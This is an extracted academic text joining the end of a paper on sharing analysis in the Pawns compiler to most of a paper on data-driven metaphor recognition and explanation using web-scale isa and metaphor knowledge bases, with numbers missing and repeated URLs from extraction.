computations. sharing analysis has been used in other languages to improve efficiency and to give some feedback to programmers but we use it to support important features of the programming language. the algorithm operates on (heap allocated) algebraic data types, including arrays and closures. in common with other sharing analysis used in declarative languages it supports binding of variables, construction and deconstruction (combined with selection or “case”) and function/procedure calls. in addition, it supports explicit pointers, destructive update via pointers, creation and application of closures and pre- and post-conditions concerning sharing attached to type signatures of functions. it also uses an abstract domain with additional features to improve precision. early indications are that the performance is acceptable: compared with other compilers for declarative languages, the prototype pawns compiler supports encapsulated destructive update, is fast and produces fast executables. 
acknowledgements feedback from reviewers, particularly gianluca amato, was very helpful in ironing out some important bugs in the algorithm and improving the presentation of this paper. additional information and declarations funding the author declares there was no funding for this work. competing interests the author declares there are no competing interests. author contributions • lee naish conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding the availability of data: http://people.eng.unimelb.edu.au/lee/src/pawns/. references bagnara r, zaffanella e, hill pm. . enhanced sharing analysis techniques: a comprehensive evaluation. in: theory and practice of logic programming. vol. . – . available at http://journals.cambridge.org/article_s . bruynooghe m. . compile time garbage collection or how to transform programs in an assignment-free language into code with assignments. in: ifip tc /wg .
working conference on program specification and transformation, bad-tölz, germany, . available at https://lirias.kuleuven.be/handle/ / . bueno f, garcía de la banda m, hermenegildo m. . effectiveness of abstract interpretation in automatic parallelization: a case study in logic programming. acm transactions on programming languages and systems ( ): – doi . / . . emami m, ghiya r, hendren lj. . context-sensitive interprocedural points-to analysis in the presence of function pointers. in: proceedings of the acm sigplan conference on programming language design and implementation, pldi' . new york: acm, – . doi . / . . giuca m. . mars: an imperative/declarative higher-order programming language with automatic destructive update. phd dissertation, university of melbourne. jacobs d, langen a. . accurate and efficient approximation of variable aliasing in logic programs. in: lusk el, overbeek ra, eds. mit press. – . available at http://dblp.uni-trier.de/db/conf/slp/slp .html#jacobsl . jones sp, hughes j, augustsson l, barton d, boutel b, burton w, fasel j, hammond k, hinze r, hudak p et al. . report on the programming language haskell , a non-strict purely functional language, february . available at http://www.haskell.org/definition/. landi w, ryder bg. . a safe approximate algorithm for interprocedural aliasing. acm sigplan notices ( ): – . doi . / . . lippmeier b. . type inference and optimisation for an impure world. phd dissertation, australian national university. available at http://cs.anu.edu.au/~ben.lippmeier/project/thesis/thesis-lippmeier-sub.pdf. mazur n, ross p, janssens g, bruynooghe m. . practical aspects for a working compile time garbage collection system for mercury. in: codognet p, ed. proceedings of iclp , lecture notes in computer science, vol. . springer, – . available at https://lirias.kuleuven.be/handle/ / . méndez-lojo m, hermenegildo m. . precise set sharing analysis for java-style programs. in: logozzo f, peled d, zuck l, eds. verification, model checking, and abstract interpretation, lecture notes in computer science, vol. . berlin heidelberg: springer, – . available at http://dx.doi.org/ . / - - - - . milner r, tofte m, macqueen d. . the definition of standard ml. cambridge: mit press. mulkers a. . live data structures in logic programs, derivation by means of abstract interpretation. springer-verlag. available at https://lirias.kuleuven.be/handle/ / . naish l. . an informal introduction to pawns: a declarative/imperative language. available at http://people.eng.unimelb.edu.au/lee/papers/pawns (accessed march ). søndergaard h. . an application of abstract interpretation of logic programs: occur check reduction. in: proceedings of the european symposium on programming on esop . new york: springer-verlag new york, inc., – . available at http://dl.acm.org/citation.cfm?id= . . wright a. . simple imperative polymorphism. lisp and symbolic computation ( ): – doi . /bf .
http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://people.eng.unimelb.edu.au/lee/papers/pawns http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. sharing analysis in the pawns compiler introduction an overview of pawns the low level view the high level view core pawns the abstract domain the sharing analysis algorithm example discussion related work conclusion acknowledgements references data-driven metaphor recognition and explanation data-driven metaphor recognition and explanation hongsong li microsoft research asia hongsli@microsoft.com kenny q. zhu shanghai jiao tong university kzhu@cs.sjtu.edu.cn haixun wang google research haixun@google.com abstract recognizing metaphors and identifying the source-target mappings is an important task as metaphorical text poses a big challenge for machine reading. to address this problem, we automatically acquire a metaphor knowledge base and an isa knowledge base from billions of web pages. using the knowledge bases, we develop an inference mechanism to rec- ognize and explain the metaphors in the text. 
to our knowledge, this is the first purely data- driven approach of probabilistic metaphor ac- quisition, recognition, and explanation. our results shows that it significantly outperforms other state-of-the-art methods in recognizing and explaining metaphors. introduction a metaphor is a way of communicating. it enables us to comprehend one thing in terms of another. for example, the metaphor, juliet is the sun, allows us to see juliet much more vividly than if shakespeare had taken a more literal approach. we utter about one metaphor for every ten to twenty-five words, or about six metaphors a minute (geary, ). specifically, a metaphor is a mapping of concepts from a source domain to a target domain (lakoff and johnson, ). the source domain is often con- crete and based on sensory experience, while tar- get domain is usually abstract. two concepts are connected by this mapping because they share some common or similar properties, and as a result, the meaning of one concept can be transferred to an- other. for example, in “juliet is the sun,” the sun is the source concept while juliet is the target concept. one interpretation of this metaphor is that both con- cepts share the property that their existence brings about warmth, life, and excitement. in a metaphor- ical sentence, at least one of the two concepts must be explicitly present. this leads to three types of metaphors: . juliet is the sun. here, both the source (sun) and the target (juliet) are explicit. . please wash your claws before scratching me. here, the source (claws) is explicit, while the target (hands) is implicit, and the context of wash is in terms of the target. . your words cut deep. here, the target (words) is explicit, while the source (possibly, knife) is implicit, and the context of cut is in terms of the source. in this paper, we focus on the recognition and ex- planation of metaphors. for a given sentence, we first check whether it contains a metaphoric expres- sion (which we call metaphor recognition), and if it does, we identify the source and the target con- cepts of the metaphor (which we call metaphor ex- planation). metaphor explanation is important for understanding metaphors. explaining type and metaphors is particularly challenging, and, to the best of our knowledge, has not been attempted for nominal concepts before. in our examples, know- ing that life and hands are the target concepts avoids the confusion that may arise if source concepts sun and claws are used literally in understanding the sen- tences. this, however, does not mean that the source nominal concepts are those represented by noun phrases. transactions of the association for computational linguistics, ( ) – . action editor: lillian lee. submitted / ; revised / ; published / . c© association for computational linguistics. concept is a useless embellishment. in the rd sen- tence, knowing that words is mapped to knife en- ables the system to understand the emotion or the sentiment embedded in the text. this is the reason why metaphor recognition and explanation is impor- tant to applications such as affection mining (smith et al., ). it is worth noting that some prefer to consider the verb “cut”, rather than the noun “words”, to be metaphoric in the rd sentence above. we instead concentrate on nominal metaphors and seek to ex- plain source-target mappings in which at least one domain is a nominal concept. 
this is because verbs usually have nominal arguments, as either subject or object, thus explaining the source-target mapping of the nominal argument covers most, if not all, cases where a verb is metaphoric. in order for machines to recognize and explain metaphors, it must have extensive human knowl- edge. it is not difficult to see why metaphor recog- nition based on simple context modeling (e.g., by selectional restriction/preference (resnik, )) is insufficient. first, not all expressions that violate the restriction are metaphors. for example, i hate to read heidegger violates selectional restriction, as the context (embodied by the verb read) prefers an object other than a person (heidegger). but, heideg- ger is not a metaphor but a metonymy, which in this case denotes heidegger’s books. second, not every metaphor violates the restriction. for example, life is a journey is clearly a metaphor, but selectional re- striction or preference is helpless when it comes to the isa context. existing approaches based on human-curated knowledge bases fall short of the challenge. first, the scale of a human-curated knowledge base is of- ten very limited, which means at best it covers a small set of metaphors. second, new metaphors are created all the time and the challenge is to rec- ognize and understand metaphors that have never been seen before. this requires extensive knowl- edge. as a very simple example, even if the machine knows sports cars are fire engines is a metaphor, it still needs to know what is a sports car before it can understand my ferrari is a fire engine is also a metaphor. third, existing human-curated knowl- edge bases (including metaphor databases and the wordnet) are not probabilistic. they cannot tell how typical an instance is of a category (e.g., a robin is a more typical bird than a penguin), or how popu- lar an expression (e.g., a breath of fresh air) is used as a source concept to describe targets in another concept (e.g., young girls). unfortunately, without necessary probabilistic information, not much rea- soning can be performed for metaphor explanation. in this paper, we address the above challenges. we start with a probabilistic isa knowledge base of many entities and categories harnessed from billions of web documents using a set of strict syntactic pat- terns known as the hearst patterns (hearst, ). we then automatically acquire a large probabilistic metaphor database with the help of both syntactic patterns and the isa knowledge base (section ). finally we combine the two knowledge bases and a probabilistic reasoning mechanism for automatic metaphor recognition and explanation (section ). this paper makes the following contributions: . to our knowledge, we are the first to intro- duce the metaphor explanation problem, which seeks to recover missing or implied source or target concepts in an implicit metaphor. . this is the first big-data driven, unsupervised approach for metaphor recognition and expla- nation. one of the benefits of leveraging big data is that the knowledge we obtain is less bi- ased, has great coverage, and can be updated in a timely manner. more importantly, a data driven approach can associate with each piece of knowledge probabilities which are not avail- able in human curated knowledge but are indis- pensable for inference and reasoning. . our results show the effectiveness both in terms of coverage and accuracy of our approach. we manage to acquire one of the largest metaphor knowledge bases ever existed with a preci- sion of %. 
the metaphor recognition accu- racy significantly outperforms the state-of-the- art methods (section ). related work existing work on metaphor recognition and interpre- tation can be divided into two categories: context- oriented and knowledge-driven. the approach pro- posed in this paper touches on both categories. . context-oriented methods some previous work relies on context to differentiate metaphorical expressions from literal ones (wilks, ; resnik, ). the selection restriction the- ory (wilks, ) argues that the meaning of an ex- pression is restricted by its context, and violations of the restriction imply a metaphor. resnik ( ) uses kl divergence to measure the selectional preference strength (sps), i.e., how strongly a context restricts an expression. although he did not use this measure directly for metaphor recognition, sps (and also a related measure called the selection association) is widely used in more re- cent approaches for metaphor recognition and inter- pretation (mason, ; shutova, ; shutova et al., ; baumer et al., ). for example, ma- son ( ) learns domain-specific selectional prefer- ences and use them to find mappings between con- cepts from different domains. shutova ( ) de- fines metaphor interpretation as a paraphrasing task. the method discriminates between literal and fig- urative paraphrases by detecting selectional prefer- ence violation. the result of this work has been compared with our approach in section . shutova et al. ( ) identify concepts in a source domain of a metaphor by clustering verb phrases and filter- ing out verbs that have weak selectional preference strength. baumer ( ) uses semantic role labeling techniques to calculate selectional preference on se- mantic relations instead of grammatic relations for metaphor recognition. a less related but also context-based work is analogy interpretation by relation mapping (turney, ). the problem is to generate mapping between source and target domains by computing pair-wise co-occurrences for different contextual patterns. our approach uses selectional restriction when enriching the metaphor knowledge base, and adopts context preference when explaining type and metaphors by focusing on the nearby verbs of a po- tential source or target concept. . knowledge-driven methods a growing number of works use knowledge bases for metaphor understanding (martin, ; narayanan, ; barnden et al., ; veale and hao, ). midas (martin, ) checks if a sen- tence contains an expression that can be explained by a more general metaphor in a human-curated metaphor knowledge base. att-meta (barnden et al., ) performs metaphor reasoning with a human-curated metaphor knowledge base and first order logic, and it focuses on affection detection (smith et al., ; agerri, ; zhang, ). kr- ishnakumaran and zhu ( ) use the isa relation in wordnet (miller, ) for metaphor recognition. gedigian et al. ( ) use framenet (fillmore et al., ) and probank (kingsbury and palmer, ) to train a maximum entropy classifier for metaphor recognition. trofi (birke and sarkar, ) rede- fines literal and non-literal as two senses of the same verb and provide two senses with seed sentences from human-curated knowledge bases like word- net, known metaphor and idiom sets. for a given sentence containing target verb, it compares the sim- ilarity of the sentence with two seed sets respec- tively. if the sentence is closer to the non-literal sense set, the verb is recognized as non-literal usage. 
while the above work all relies on human cu- rated data sets or manual labeling, veale and hao ( ) introduced the notion of talking points which are figurative properties of noun-based concepts. for example, the concept “hamas” has the follow- ing talking points: is islamic:movement and gov- erns:gaza strip. they automatically constructed a knowledge base called slip net from wordnet and web corpus. concepts that are connected on the slip net can “slip” to one another and are hence considered related in a metaphor. however, straight- forward traversal on the slip net can become com- putationally impractical and the authors did not elab- orate on the implementation details. in practice, the knowledge acquired in this paper is much larger but our algorithms are computationally more feasible. obtaining probabilistic knowledge in this section, we describe how to use a large, general-purpose, probabilistic isa knowledge base Γh to create a probabilistic metaphor dataset Γm. Γh contains isa pairs as well as scores associated with each pair. the metaphor dataset Γm contains metaphors of the form: (source, target), and a weight function pm that maps a metaphor pair to a probabilistic score. the purpose of creating Γh is to help clean and expand Γm, and to perform proba- bilistic inference for metaphor detection. . isa knowledge Γh Γh , a general-purpose, probabilistic isa knowl- edge base, was previously constructed by wu et al.( ). Γh contains isa relations in the form of (x,hx), a pair of hyponym and hypernym, for exam- ple, (steve ballmer, ceo of it companies), and each pair is associated with a set of probabilistic scores. two of the most important scores are known as typ- icality: p(x|hx), the typicality of x of category hx, and p(hx|x), the typicality of category hx for in- stance x, which will be used in metaphor recogni- tion and explanation. both scores are approximated by frequencies, e.g., p(x|hx) = # of (x,hx) in hearst extraction # of hx in hearst extraction in total, Γh contains million unique isa rela- tionships, and . million unique concepts or cate- gories (the hx’s in (x,hx) pairs). the importance of big data is obvious. Γh contains millions of cat- egories and probabilistic scores for each category which enables inference for metaphor understand- ing, as we will show next. . acquiring metaphors Γm we acquire an initial set of metaphors Γm from sim- iles. a simile is a figure of speech that explicitly compares two different things using words such as “like” and “as”. for example, the sentence life is like a journey is a simile. without the word “like,” it becomes a metaphor: life is a journey. this property makes simile an attractive first target for metaphor extraction from a large corpus. we use the following syntactic pattern for extraction: 〈target〉 be/vb like [a] 〈source〉 ( ) where be denotes is/are/has been/have been, etc., vb denotes verb other than be, and 〈target〉 and 〈source〉 denote noun phrases or verb phrases. note that not every extracted pair is a metaphor. poetry is like an art matches the pattern, but it is not a metaphor because poetry is really an art. we will use Γh to clean such pairs. furthermore, due to the dataset can be found at http://probase.msra.cn/. idiosyncrasies of natural languages, it is not trivial to correctly extract the 〈target〉 and the 〈source〉 from each sentence that matches the pattern. we use a postagger and a lemmatizer on the sentences, and we develop a rule-based system that contains more than two dozen rules for extraction. 
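The typicality scores above are plain relative frequencies over the Hearst-pattern extractions. The following is a minimal sketch of how they might be computed from a table of (instance, hypernym) extraction counts; the toy counts and function names are illustrative assumptions, not data or code from the paper.

from collections import defaultdict

# hypothetical (instance, hypernym) extraction counts from hearst patterns
hearst_counts = {
    ("steve ballmer", "ceo"): 12,
    ("bill gates", "ceo"): 40,
    ("robin", "bird"): 120,
    ("penguin", "bird"): 15,
}

totals_per_hypernym = defaultdict(int)
totals_per_instance = defaultdict(int)
for (x, h), n in hearst_counts.items():
    totals_per_hypernym[h] += n
    totals_per_instance[x] += n

def typicality_x_given_h(x, h):
    # p(x|h): how typical instance x is of category h
    return hearst_counts.get((x, h), 0) / totals_per_hypernym[h]

def typicality_h_given_x(x, h):
    # p(h|x): how typical category h is for instance x
    return hearst_counts.get((x, h), 0) / totals_per_instance[x]

print(typicality_x_given_h("robin", "bird"))    # a robin is a more typical bird than a penguin
print(typicality_x_given_h("penguin", "bird"))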
for example, a rule of high-precision but low-recall is “〈target〉 must be at the beginning of a sentence or the beginning of a clause (e.g., following the word that)”. finally, from , , sentences that match the above pattern (pattern ), we obtain . million unique (x,y) pairs, and after filtering, we are left with close to million unique metaphor pairs, which form the starting point of Γm. . cleaning, expanding, and weighting Γm the simile pattern only allows us to extract some of the available metaphor pairs. to expand Γm, we use a more flexible but also noisier pattern to extract more candidate metaphor pairs from billions of sen- tences in the web corpus: 〈target〉 be [a] 〈source〉 ( ) the above “is a” pattern covers metaphors such as life is a journey. but many pairs thus extracted are not metaphors, for example, malaysia is a tropical country. that is, pairs extracted by the “is a” pat- tern contains at least two types of relations: the lit- eral isa relations and the metaphor relations. the problem is how to distinguish one from the other. in theory, the set of all isa relations, i, and the set of all metaphor relations, m, do not overlap, because by definition, the source concept and the target con- cept in a metaphor are not the same thing. thus, our intuition is the following. the pairs produced by the simile pattern, called s, is a subset of m, while the pairs extracted from the hearst pattern, called h, is also a subset of i. since m and i hardly overlap, s and h should have little overlap, too. in practice, very few people would say something like journeys such as life. figure illustrates this scenario. to verify this intuition, we randomly sampled , sentences and manually annotated them. of these sentences, contain an isa relation, of which are enclosed in a hearst’s pattern and can be extracted by the “is a” pattern. furthermore, of these sentences contain a metaphor expression, (beast, sports car)(sports car, ferrari) (vehicle, ferrari) (beast, ferrari) hearst pattern is-a relation simile pattern metaphor relation “is a” pattern figure : relations among different sets. dotted circles represent relations (ground truth). solid circles represent pairs extracted by syntactic patterns. and within the metaphors, are embedded in a simile pattern. more importantly, there is no overlap between the isa relations and metaphors (and hence the similes). in a larger scale experiment, we crawled billion sentences which match the “is a” pattern ( ) from the web corpus. from these, we extracted million unique (x,y) pairs. . % of Γh can be found in “is a” pattern pairs, while . % of Γm can be found in “is a” pattern pairs. further more, there is almost no overlap between Γh and Γm: . % of Γh can be found in Γm, and . % of Γm can be found in Γh . our goal is to use the information collected through the syntactic patterns to enrich the metaphor relations or Γm. armed with the above observations, we make two conclusions. first, the (life, journey) pair we extracted from life is a journey is more likely a metaphor since it does not appear in the set ex- tracted from hearst patterns. second, if any existing pair in Γm also appears in Γh , we can remove that pair from Γm. from the million unique (x,y) pairs we ex- tracted earlier, by filtering out low frequency pairs and those pairs in Γh , we obtain . million of fresh metaphors. this is almost times larger than initial metaphor set obtained from the simile pattern. we further expand Γm by adding metaphors derived from Γm and Γh . 
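A rough sketch of the acquisition and cleaning steps described above: the high-precision simile pairs form the core of the metaphor base, and candidate pairs from the noisier "is a" pattern are added only if they are frequent enough and do not already appear as literal isa pairs in the Hearst-pattern knowledge base. The toy data and the frequency cutoff are assumptions for illustration.

# assumed toy inputs for illustration
simile_pairs = {("life", "journey"), ("ferrari", "beast")}                 # from the "is like a" pattern
literal_isa_pairs = {("malaysia", "tropical country"), ("poetry", "art")}  # from hearst patterns (gamma_h)
isa_pattern_counts = {                                                     # from the noisier "is a" pattern
    ("life", "journey"): 90,
    ("malaysia", "tropical country"): 200,
    ("time", "money"): 55,
    ("idea", "seed"): 3,
}

MIN_FREQ = 5  # assumed frequency cutoff; the paper tunes this by sampling pairs at each frequency

def build_metaphor_base(simile_pairs, literal_isa_pairs, isa_pattern_counts, min_freq=MIN_FREQ):
    # start from the high-precision simile pairs, minus anything that is literally an isa pair
    gamma_m = {pair for pair in simile_pairs if pair not in literal_isa_pairs}
    # expand with frequent "is a" pairs that are not literal isa relations
    for pair, freq in isa_pattern_counts.items():
        if freq >= min_freq and pair not in literal_isa_pairs:
            gamma_m.add(pair)
    return gamma_m

print(build_metaphor_base(simile_pairs, literal_isa_pairs, isa_pattern_counts))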
assume (x,y) ∈ Γm, and (x,hx) ∈ Γh , then we add (hx,y) to Γm. as an example, if (julie,sun) ∈ Γm, specifically, we randomly sample pairs of frequency , , ..., from Γm and check the precisions of each group. we filter out pairs with frequency less than to optimize the precision. then we add (person name,sun) to Γm, since (julie,person name) ∈ Γh . this enables the metaphor detection approach we describe in section . note that we ignore transitivity in the isa relations from Γh as such transitivity is not always reliable. for example, car seat is a chair, and chair is furni- ture, but car seat is not furniture. how to handle transitivity in a data driven isa taxonomy is a chal- lenging problem, and is beyond the scope here. finally, we calculate the weight of each metaphor (x,y). the weight pm(x,y) is calculated as follows: pm(x,y) = occurrences of (x,y) in isa pattern occurrences of isa pattern ( ) the weights of derived metaphors, such as (person name,sun), are calculated as follows: pm(hx,y) = ∑ (x,hx)∈Γh pm(x,y) ( ) probabilistic metaphor understanding in this paper, we consider two aspects of metaphor understanding, metaphor recognition and metaphor explanation. the latter is needed for type and metaphors where either the source or the target con- cept is implicit or missing. next, we describe a prob- abilistic approach to accomplish these two tasks. . type metaphors in a type metaphor, both the source and the tar- get concepts appear explicitly. when a sentence matches “is a” pattern (pattern ), it is a potential metaphor expression. the first noun in the pattern is the target candidate, while the second noun is the source candidate. to recognize type metaphors, we first obtain the candidate (source, target) pair from the sentence. then, we check if we have any knowledge about the (source, target) pair. intuitively, if the pair exists in the metaphor dataset Γm, then it is a metaphor. if the pair ex- ists in the is-a knowledge base Γh , then it is not a metaphor. but because Γm is far from being com- plete, if a pair exists in neither Γm nor Γh , there is a possibility that it is a metaphor we have never seen before. in this case, we reason as follows. consider a sentence such as my ferrari is a beast. assume (ferrari, beast) ∈ Γm, but (sports car, beast) ∈ Γm. note that (sports car, beast) may it- self be a derived metaphor which is added into Γm in metaphor expansion, and the original metaphor ex- tracted from the web data is (lamborghinis, beast). furthermore, from Γh , we know ferrari is a sports car, that is, (ferrari, sports car) ∈ Γh , we can then infer that ferrari to beast is very likely a metaphor mapping. specifically, let (x,y) be a pair we are concerned with. we want to compute the odds of (x,y) repre- senting a metaphor vs. a normal is-a relationship: p(x,y) −p(x,y) ( ) where p(x,y) is the probability that (x,y) forms a metaphor. now, combining the knowledge we have in Γh , we have p(x,y) = ∑ (x,hx)∈Γh p(x,hx,y) ( ) here, hx is a possible superconcept, i.e., a possible interpretation, for x. for example, if x = apple, then two highly possible interpretations are com- pany and fruit. in eq.( ), we want to aggregate on all possible interpretations (all superconcepts) of x. this is possible because of the massive size of the concept space in Γh . we can rewrite eq.( ) to the following: p(x,y) = ∑ (x,hx)∈Γh p(y|x,hx)p(x|hx)p(hx) ( ) here, p(y|x,hx) means when x is interpreted as an hx, the probability of y as a target metaphorical con- cept for hx. 
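Restating the flattened weight equations above: pm(x, y) is the relative frequency of the pair under the "is a" pattern, and a derived metaphor (hx, y) inherits the summed weight of all instances x of hx. A small sketch under toy assumptions:

# assumed toy counts of (target, source) pairs observed under the "is a" pattern
isa_pattern_counts = {("julie", "sun"): 4, ("juliet", "sun"): 9, ("life", "journey"): 90}
total_isa_pattern_occurrences = sum(isa_pattern_counts.values())  # stands in for the corpus-wide count

def pm(x, y):
    # weight of metaphor (x, y): its relative frequency under the "is a" pattern
    return isa_pattern_counts.get((x, y), 0) / total_isa_pattern_occurrences

# gamma_h reduced to a map from instance x to its hypernyms hx (toy data)
hypernyms = {"julie": ["person name"], "juliet": ["person name", "character"]}

def pm_derived(hx, y):
    # pm(hx, y) = sum of pm(x, y) over all x with (x, hx) in gamma_h
    return sum(pm(x, y) for x, hs in hypernyms.items() if hx in hs)

print(pm_derived("person name", "sun"))  # weight of the derived metaphor (person name, sun)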
thus, given hx, y is independent with x, so p(y|x,hx) can be simply replaced by p(y|hx). we can then rewrite eq.( ) to: p(x,y) = ∑ (x,hx)∈Γh p(y|hx)p(x|hx)p(hx) = ∑ (x,hx)∈Γh p(hx,y)p(x|hx) ( ) it is clear p(hx,y) is simply pm(hx,y) in eq.( ) given by the metaphor dataset Γm. furthermore, p(x|hx) is the typicality of x in the hx category, and p(hx) is the prior of the category hx. both of them are available from the isa knowledge base Γh . thus, we can calculate eq.( ) using information in the two knowledge bases we have created. if the odds in eq.( ) is greater than a thresh- old δ, which is determined empirically to be δ = p (metaphor) p (isa) , we declare (x,y) as a metaphor. . context preference modeling it is more difficult to recognize metaphors when the source concept or the target concept is not explic- itly given in a sentence. in this case, we rely on the context in the sentence. given a sentence, we find metaphor candidates and the context. here, candidates are noun phrases in the sentence which can potentially be the target or the source concept of a metaphor, while context denotes words that have a grammatic dependency with the candidate. the dependency can be subject- predicate, predicate-object, or modifier-header, etc. the context can be a verb, a noun phrase, or an ad- jective which has certain preference over the target or source candidate. for example, the word horse prefers verbs such as jump, drink and eat; the word flower prefers modifiers such as red, yellow and beautiful. in this work, we focus on analyzing the prefer- ences of verbs using subject-predicate or predicate- object relation between the verb and the noun phrases. we select , most frequent verbs from the web corpus. for each verb, we construct the dis- tribution of noun phrases depend on the verb in the sentences sampled from the web corpus. the noun phrases are restricted to be those that occur in Γh . more specifically, for any noun phrase y that ap- pears in Γh , we calculate the following pr(c|y) = fr(y,c)∑ c fr(y,c) ( ) where fr(y,c) means the frequency of y and con- text c with relation r. note we can build prefer- ence distribution for context other than verbs since, in theory, r can be any relation (e.g. modifier-head relation). . type and type metaphors if a sentence contains type and type metaphors, either the source or the target concepts in the sen- this is the ratio between the number of metaphors and is-a pairs in a random sample of “is a” pattern sentences. tence is missing. for each noun phrase x and a con- text c in such a sentence, we want to know whether x is of literal or metaphoric use. it is a metaphoric use if the selectional preference of some y, which is a source or target concept of x in Γm, is larger than the selectional preference of any super-concept of x in Γh , by a factor δ. formally, there exists a y where (x,y) ∈ Γm or (y,x) ∈ Γm, such that p(y|x,c) p(h|x,c) ≥ δ, ∀(x,h) ∈ Γh. ( ) to compute ( ), we have p(y|x,c) = p(x,y,c) p(x,c) = p(x,y)p(c|x,y) p(x,c) ( ) assuming x is a target concept and y is a source concept (a type metaphor), we can obtain p(x,y) by eq.( ). furthermore, c is independent of x in a type or metaphor, since a metaphor is an unusual use of x (the target) within a given context. therefore p(c|x,y) = p(c|y), where p(c|y) is available from eq. ( ). similarly, we have p(h|x,c) = p(x,h)p(c|h) p(x,c) ( ) where p(x,h) is obtained from Γh and p(c|h) is from the context preference distribution. 
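Putting the type-1 pieces together: the metaphor probability of a pair (x, y) sums, over every interpretation hx of x in the isa knowledge base, the derived metaphor weight pm(hx, y) times the typicality p(x|hx), and the resulting odds are compared against the threshold δ. A hedged sketch; the helper arguments, the threshold value, and the toy numbers are illustrative, not taken from the paper.

DELTA = 0.05  # assumed threshold; the paper sets it from the metaphor/isa ratio in a labeled sample

def metaphor_probability(x, y, hypernyms_of, p_x_given_h, pm_derived):
    # p(x, y) = sum over hx of pm(hx, y) * p(x | hx), as in the rewritten equation above
    return sum(pm_derived(hx, y) * p_x_given_h(x, hx) for hx in hypernyms_of(x))

def is_type1_metaphor(x, y, hypernyms_of, p_x_given_h, pm_derived, delta=DELTA):
    p = metaphor_probability(x, y, hypernyms_of, p_x_given_h, pm_derived)
    if p >= 1.0:                      # guard against degenerate estimates
        return True
    return p / (1.0 - p) > delta      # odds of a metaphor reading versus a literal isa reading

# toy example for "my ferrari is a beast"; the lambdas stand in for the knowledge-base lookups
hyp = lambda x: {"ferrari": ["sports car", "product"]}.get(x, [])
p_x_h = lambda x, h: {("ferrari", "sports car"): 0.3, ("ferrari", "product"): 0.01}.get((x, h), 0.0)
pm_d = lambda h, y: {("sports car", "beast"): 0.2}.get((h, y), 0.0)
print(is_type1_metaphor("ferrari", "beast", hyp, p_x_h, pm_d))  # True: recognized as a metaphor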
to explain the metaphor, or uncover the missing concept, y∗ = arg max y ∧ (y,x)∈Γm p(y|x,c) = arg max y ∧ (y,x)∈Γm p(y,x)p(c|y) as a concrete example, consider sentence my car drinks gasoline. there are two possible targets: car and gasoline. the context for both targets is the verb drink. let x = car. by eq.( ), we first find all y’s for which (car,y) ∈ Γm or (y,car) ∈ Γm. we get terms such as woman, friend, gun, horse, etc. when we calculate p(car,y) by eq.( ), we also need to find hypernyms of car in Γh , which type metaphors can be handled similarly. may include vehicle, product, asset, etc. for each candidate y, p(y|car,c) is calculated by metaphor knowledge p(x,y) and context preference p(c|yi). table shows the result. since the selectional pref- erence of horse (from Γm) is much larger than other literal uses of car, this sentence is recognized as a metaphor, and the missing source concept is horse. table : log probabilities (m: metaphor, l:literal). type yi log log log p(yi p(yi,car) p(c|yi) |car,c) l vehicle - . -∞ -∞ l product - . -∞ -∞ l asset - . -∞ -∞ m woman - . - . - . m friend - . - . - . m gun - . -∞ -∞ m horse - . - . - . ... ... ... ... ... experimental result we evaluate the performance of metaphor acquisi- tion, recognition and explanation in our system and compare it with several state-of-the-art mechanisms. . metaphor acquisition from the web corpus, we collected , , sen- tences matching the “is like a” pattern (pattern ) and we extracted , unique high quality sim- ile mappings from them. these simile mappings became the core of Γm. Γh contains , , unique isa pairs. we also collected , , , sentences matching the “is a” pattern (pattern ), from which , , unique mappings were ex- tracted. these mappings contain both metaphors and isa relations. from there, we identified , , pairs of metaphors unseen in the sim- ile set. these new metaphor pairs were added to Γm. random samples show that the precisions of the core metaphor dataset and the whole dataset are . % and %, respectively. all of the above datasets, a sample of context preference, as well as the test sets mentioned in this section can be found at http://adapt.seiee.sjtu.edu. cn/˜kzhu/metaphor. . type metaphor recognition we compare our type metaphor recognition with the method (known as kz) by krishnakumaran and zhu ( ). for sentences containing “x is a y” pat- tern, 